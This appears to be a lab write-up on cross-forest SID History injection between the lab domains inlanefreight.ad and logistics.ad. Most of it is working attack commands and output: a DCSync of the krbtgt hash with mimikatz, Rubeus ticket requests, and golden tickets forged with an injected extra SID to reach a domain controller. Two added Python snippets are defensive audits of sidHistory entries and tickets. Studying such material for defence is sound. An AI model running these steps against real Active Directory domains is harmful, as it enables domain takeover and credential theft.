Cross-Forest Attack - SID History Injection

A SID History injection attack, also known as SID hijacking, is a technique that abuses the SID (security identifier) history attribute of Active Directory user accounts to escalate privileges. When a user account is migrated from one domain to a domain in a different forest, its SID history attribute retains the SID from the previous domain.

The sidHistory attribute exists for migration scenarios. When a user from one domain is migrated to another, a new account is created in the second domain. The original user's SID is added to the new user's SID history attribute so that the user can still access resources in the original domain.

When SID history is enabled between two forests, an extra-SIDs attack becomes possible, but SID filtering is enabled by default across a forest trust (SIDs with a RID below 1000 are filtered out, so only SIDs with a RID of 1000 or above can be used).

1. Case demonstration

1.1. High-privileged migrated user

Assume a user named Sentinal was migrated from the logistics.ad domain to the inlanefreight.ad domain. Although Sentinal only holds ordinary Domain Users rights in inlanefreight.ad, its SID history still carries its former domain membership, from when Sentinal was a member of the Infrastructure group. The Infrastructure group is in turn a member of the Administrators group and therefore holds elevated privileges.
[Image: Pasted image 20260309174358.png]

1.1.1. Enumerate users with SID history enabled

PS C:\Tools>  Get-ADUser -Filter "SIDHistory -Like '*'" -Properties SIDHistory

DistinguishedName : CN=sentinal,CN=Users,DC=inlanefreight,DC=ad
Enabled           : True
GivenName         : sentinal
Name              : sentinal
ObjectClass       : user
ObjectGUID        : a0304e33-8f23-4020-bd7e-78abe1fe0649
SamAccountName    : sentinal
SID               : S-1-5-21-2432454459-173448545-3375717855-2601
SIDHistory        : {S-1-5-21-186204973-2882451676-2899969076-2602}
Surname           :
UserPrincipalName : sentinal@inlanefreight.ad
  • The user sentinal has a SIDHistory attribute because it was migrated from the logistics domain to the inlanefreight domain

1.1.2. Reset the user's password

We don't know this user's password, but the account belongs to the current domain, so we can reset it.

PS C:\Tools> net user sentinal sentinal
The command completed successfully.

1.1.3. Create a sacrificial logon session with Rubeus

PS C:\Tools> ./Rubeus createnetonly /program:powershell.exe /show
______        _
(_____ \      | |
_____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v2.2.3

[*] Action: Create Process (/netonly)

[*] Using random username and password.
[*] Showing process : True
[*] Username        : FLTNQYMI
[*] Domain          : YH4TURBL
[*] Password        : KNNI2TMI
[+] Process         : 'powershell.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 4752
[+] LUID            : 0x52dacc

1.1.4. Request a TGT with Rubeus

PS C:\Tools> .\Rubeus.exe asktgt /user:sentinal /password:sentinal /domain:inlanefreight.ad /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'inlanefreight.ad\sentinal'
[*] Using domain controller: fe80::29f4:c79f:56c1:ae29%6:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFajCCBWagAwIBBaEDAgEWooIEczCCBG9hggRrMIIEZ6ADAgEFoRIbEElOTEFORUZSRUlHSFQuQUSiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEGlubGFuZWZyZWlnaHQuYWSjggQjMIIEH6ADAgESoQMCAQKiggQRBIIEDfulYP/JrkPSD4dn96fit0AOo7bgf3UFZJN8mrwnkEfLc0IjyWrBA3mRvzjjU5O8XbITkOrGHnmy
     ...[SNIP]...
dGluYWyjBwMFAEDhAAClERgPMjAyNDAzMjQxNzU2MjlaphEYDzIwMjQwMzI1MDM1NjI5WqcRGA8yMDI0MDMzMTE3NTYyOVqoEhsQSU5MQU5FRlJFSUdIVC5BRKklMCOgAwIBAqEcMBobBmtyYnRndBsQaW5sYW5lZnJlaWdodC5hZA==
[+] Ticket successfully imported!

  ServiceName              :  krbtgt/inlanefreight.ad
  ServiceRealm             :  INLANEFREIGHT.AD
  UserName                 :  sentinal
  UserRealm                :  INLANEFREIGHT.AD
  StartTime                :  3/24/2024 10:56:29 AM
  EndTime                  :  3/24/2024 8:56:29 PM
  RenewTill                :  3/31/2024 10:56:29 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  nyNcm7wPMp3K1cfz1ok7Ug==
  ASREP (key)              :  58A478135A93AC3BF058A5EA0E8FDB71

1.1.5. Access DC02 via PSSession

PS C:\Tools> Enter-PSSession DC02.logistics.ad
[DC02.logistics.ad]: PS C:\Users\sentinal\Documents> hostname;whoami
DC02
inlanefreight\sentinal

1.2. Low-privileged migrated user (SID injection)

If the current user's privileges are low, we can inject a high-privileged user's SID into an existing user account and exploit the residual SID association to escalate privileges within the domain.

To identify a forest with SID History enabled, check whether the TrustAttributes property contains the TREAT_AS_EXTERNAL flag. If this value is present, SID History is enabled for that forest.

1.2.1. Enumerate SID history

PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainTrust -domain logistics.ad
SourceName      : logistics.ad
TargetName      : inlanefreight.ad
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : TREAT_AS_EXTERNAL,FOREST_TRANSITIVE
TrustDirection  : Bidirectional
WhenCreated     : 12/26/2023 4:13:40 PM
WhenChanged     : 3/13/2024 1:02:44 PM

  • The target has the TREAT_AS_EXTERNAL flag, so SIDHistory is enabled

If SID history is enabled between the logistics and inlanefreight domains, an Extrasids attack becomes possible. This attack involves injecting the SID of a high-privileged group or user from the logistics domain into any user object in the inlanefreight domain. Note in particular that cross-forest trusts usually have SID Filtering enabled by default, which restricts acceptance to SIDs whose relative identifier (RID) is greater than 1000.
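As an added example (not part of the original write-up), the following Python models the filtering rule described above and audits sidHistory entries from the resource forest's point of view, so a logistics.ad administrator can see which migrated accounts still carry SIDs that confer access. The rule set is a deliberate simplification of what the page states, and every user other than sentinal is constructed.

```python
import re

# Values taken from the write-up: logistics.ad is the resource forest whose DCs
# apply SID filtering to PACs arriving from inlanefreight.ad.
LOGISTICS_SID = "S-1-5-21-186204973-2882451676-2899969076"
LOGISTICS_TRUST_ATTRIBUTES = "TREAT_AS_EXTERNAL,FOREST_TRANSITIVE"

def parse_sid(sid):
    """Split a domain SID into (domain identifier, RID); non-domain SIDs raise."""
    m = re.fullmatch(r"(S-1-5-21-\d+-\d+-\d+)-(\d+)", sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid}")
    return m.group(1), int(m.group(2))

def sid_history_enabled(trust_attributes):
    """True when the TrustAttributes string (PowerView format) carries TREAT_AS_EXTERNAL."""
    return "TREAT_AS_EXTERNAL" in {a.strip() for a in trust_attributes.split(",")}

def survives_sid_filter(sid, resource_domain_sid, trust_attributes):
    """Simplified model (assumption: only the two rules stated in the write-up):
    an extra SID arriving over the forest trust is kept by the resource forest
    only if SID history is enabled on the trust and the RID is 1000 or above."""
    domain, rid = parse_sid(sid)
    if domain != resource_domain_sid:
        return False        # not one of the resource domain's SIDs: out of scope here
    if not sid_history_enabled(trust_attributes):
        return False        # default SID filtering drops every SID history entry
    return rid >= 1000      # RID < 1000 (built-in groups, krbtgt, ...) is filtered

def audit_sid_history(users, resource_domain_sid, trust_attributes):
    """Defender audit: (user, sid, rid) for every sidHistory entry that would still
    confer access in the resource forest. `users` maps SamAccountName to the list
    of SIDs in its sidHistory attribute, as returned by Get-ADUser."""
    findings = []
    for sam, history in users.items():
        for sid in history:
            if survives_sid_filter(sid, resource_domain_sid, trust_attributes):
                findings.append((sam, sid, parse_sid(sid)[1]))
    return findings

# Constructed inventory: sentinal's entry is the one shown above; the other two
# are made up to exercise the RID < 1000 and foreign-domain branches.
USERS = {
    "sentinal": ["S-1-5-21-186204973-2882451676-2899969076-2602"],
    "migrated_admin": ["S-1-5-21-186204973-2882451676-2899969076-512"],
    "other": ["S-1-5-21-1111111111-2222222222-3333333333-1105"],
}

if __name__ == "__main__":
    for sam, sid, rid in audit_sid_history(USERS, LOGISTICS_SID, LOGISTICS_TRUST_ATTRIBUTES):
        print(f"{sam}: {sid} (RID {rid}) would pass SID filtering into logistics.ad")
```

Feeding the audit the real output of Get-ADUser -Filter "SIDHistory -Like '*'" and Get-DomainTrust gives a quick list of accounts to review, or to clean up once migration is complete.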

1.2.2. Obtain the high-privileged SID

We can use BloodHound to collect the SIDs of high-privileged groups whose RID is greater than 1000.

[Image: Pasted image 20260309180049.png]
Here the Infrastructure group turns out to be a high-privileged group with RID 2602. We can inject the Infrastructure group's SID into any user object in the inlanefreight domain, for example inlanefreight\jimmy, which may lead to privilege escalation or unauthorized access.

1.2.3. Perform the SID injection attack (extra-SIDs)

Requirements:

  • The KRBTGT hash of the current domain
  • The SID of the current domain
  • The FQDN of the current domain
  • The SID of a high-privileged group in the target domain, here Infrastructure

1.2.4. Obtain the current domain's krbtgt hash

mimikatz is used here.

PS C:\Tools> .\mimikatz.exe "lsadump::dcsync /user:INLANEFREIGHT\krbtgt" exit

.#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > https://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
'#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:INLANEFREIGHT\krbtgt
[DC] 'inlanefreight.ad' will be the domain
[DC] 'DC01.inlanefreight.ad' will be the DC server
[DC] 'INLANEFREIGHT\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt
** SAM ACCOUNT **
SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 12/26/2023 8:38:43 AM
Object Security ID   : S-1-5-21-2432454459-173448545-3375717855-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 119885a9af438d1ef0d7543bed8b9ea1
  ntlm- 0: 119885a9af438d1ef0d7543bed8b9ea1
  lm  - 0: 6c3a4fff93ba201c4ae9735c68e93e47

1.2.5. Obtain the current domain's SID

PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainSID
S-1-5-21-2432454459-173448545-3375717855

1.2.6. Obtain the SID of the Infrastructure group

PS C:\Tools> Get-ADGroup -Identity "Infrastructure" -Server "logistics.ad"
DistinguishedName : CN=Infrastructure,CN=Users,DC=logistics,DC=ad
GroupCategory     : Security
GroupScope        : Universal
Name              : Infrastructure
ObjectClass       : group
ObjectGUID        : fe42a45c-a42c-4945-98ca-57446ab9430a
SamAccountName    : Infrastructure
SID               : S-1-5-21-186204973-2882451676-2899969076-2602

1.2.7. Forge a golden ticket with Rubeus

PS C:\Tools> .\Rubeus.exe golden /rc4:119885a9af438d1ef0d7543bed8b9ea1 /domain:inlanefreight.ad /sid:S-1-5-21-2432454459-173448545-3375717855 /sids:S-1-5-21-186204973-2882451676-2899969076-2602 /user:jimmy /ptt
______        _
(_____ \      | |
_____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v2.2.0

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : INLANEFREIGHT.AD (INLANEFREIGHT)
[*] SID            : S-1-5-21-2432454459-173448545-3375717855
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ExtraSIDs      : S-1-5-21-186204973-2882451676-2899969076-2602
[*] ServiceKey     : 119885A9AF438D1EF0D7543BED8B9EA1
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey         : 119885A9AF438D1EF0D7543BED8B9EA1
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_MD5
[*] Service        : krbtgt
[*] Target         : inlanefreight.ad
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'jimmy@inlanefreight.ad'
[*] AuthTime       : 3/28/2024 3:34:15 PM
[*] StartTime      : 3/28/2024 3:34:15 PM
[*] EndTime        : 3/29/2024 1:34:15 AM
[*] RenewTill      : 4/4/2024 3:34:15 PM
[*] base64(ticket.kirbi):


[+] Ticket successfully imported!

1.2.8. Forge a golden ticket with mimikatz

C:\Tools> mimikatz.exe
.#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > https://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
'#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # kerberos::golden /user:jimmy /domain:inlanefreight.ad  /sid:S-1-5-21-2432454459-173448545-3375717855 /sids:S-1-5-21-186204973-2882451676-2899969076-2602 /krbtgt:119885a9af438d1ef0d7543bed8b9ea1 /ptt
User      : jimmy
Domain    : inlanefreight.ad (INLANEFREIGHT)
SID       : S-1-5-21-2432454459-173448545-3375717855
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-186204973-2882451676-2899969076-2602 ;
ServiceKey: 119885a9af438d1ef0d7543bed8b9ea1 - rc4_hmac_nt
Lifetime  : 3/28/2024 3:41:08 PM ; 3/26/2034 3:41:08 PM ; 3/26/2034 3:41:08 PM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'jimmy @ inlanefreight.ad' successfully submitted for current session
PS C:\Tools> klist

Current LogonId is 0:0x5126a

Cached Tickets: (1)

#0>     Client: jimmy @ INLANEFREIGHT.AD
Server: krbtgt/inlanefreight.ad @ INLANEFREIGHT.AD
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 3/28/2024 15:34:15 (local)
End Time:   3/29/2024 1:34:15 (local)
Renew Time: 4/4/2024 15:34:15 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

This ticket carries the extra SID of the Infrastructure group in the Logistics domain and can be used for cross-forest access.
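Looking at the same tickets from the defensive side, as an added example that is not part of the original write-up: the Python below parses klist output (a constructed sample modelled on the listing above) and flags two tells the forged tickets exhibit, a lifetime beyond the default 10-hour user-ticket policy, as in the mimikatz output, and a krbtgt ticket keyed with RC4-HMAC. The 10-hour policy value is the Windows default and is an assumption of this example.

```python
import re
from datetime import datetime, timedelta

MAX_TICKET_AGE = timedelta(hours=10)   # default "Maximum lifetime for user ticket" policy

# Constructed klist output. Ticket #0 mirrors the Rubeus ticket listed above;
# ticket #1 carries the 10-year lifetime mimikatz's golden command emits by default.
KLIST_OUTPUT = """\
Cached Tickets: (2)

#0>     Client: jimmy @ INLANEFREIGHT.AD
        Server: krbtgt/inlanefreight.ad @ INLANEFREIGHT.AD
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 3/28/2024 15:34:15 (local)
        End Time:   3/29/2024 1:34:15 (local)

#1>     Client: jimmy @ INLANEFREIGHT.AD
        Server: krbtgt/inlanefreight.ad @ INLANEFREIGHT.AD
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 3/28/2024 15:41:08 (local)
        End Time:   3/26/2034 15:41:08 (local)
"""

FIELD_RE = re.compile(r"(Client|Server|KerbTicket Encryption Type|Start Time|End Time): *(.+)")

def parse_klist(text):
    """Turn klist's per-ticket blocks into dicts keyed by the field names above."""
    tickets, cur = [], None
    for line in text.splitlines():
        if re.match(r"#\d+>", line):          # "#0>" starts a new ticket
            cur = {}
            tickets.append(cur)
        m = FIELD_RE.search(line) if cur is not None else None
        if m:
            cur[m.group(1)] = m.group(2).replace("(local)", "").strip()
    return tickets

def ticket_findings(tickets, max_age=MAX_TICKET_AGE):
    """Flag TGTs whose lifetime exceeds the domain policy (a forged-ticket tell) and
    krbtgt tickets encrypted with RC4, which merit a look in an AES-enabled domain."""
    fmt, findings = "%m/%d/%Y %H:%M:%S", []
    for t in tickets:
        life = datetime.strptime(t["End Time"], fmt) - datetime.strptime(t["Start Time"], fmt)
        if life > max_age:
            findings.append((t["Client"], f"lifetime {life} exceeds policy {max_age}"))
        if t["Server"].startswith("krbtgt/") and "RC4" in t["KerbTicket Encryption Type"]:
            findings.append((t["Client"], "TGT encrypted with RC4-HMAC"))
    return findings

if __name__ == "__main__":
    for client, reason in ticket_findings(parse_klist(KLIST_OUTPUT)):
        print(f"{client}: {reason}")
```

The Rubeus golden ticket keeps the 10-hour lifetime and would not be caught by the lifetime rule alone, which is why the encryption-type check and the domain-side signals (DCSync of krbtgt, a user account's sidHistory changing) matter more than any single host-side heuristic.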

1.2.9. Access DC02

PS C:\Tools> dir \\DC02.logistics.ad\c$
Directory: \\DC02.logistics.ad\c$
Mode                LastWriteTime         Length Name
----                -------------         ------ ----

d-----        3/20/2024   1:44 PM                FSP_Flag
d-----        7/16/2016   6:23 AM                PerfLogs
d-r---        3/24/2024  10:47 AM                Program Files
d-----        7/16/2016   6:23 AM                Program Files (x86)
d-----        3/28/2024   1:31 PM                Tools
d-r---       12/26/2023   7:21 AM                Users
d-----       12/26/2023   7:40 AM                Windows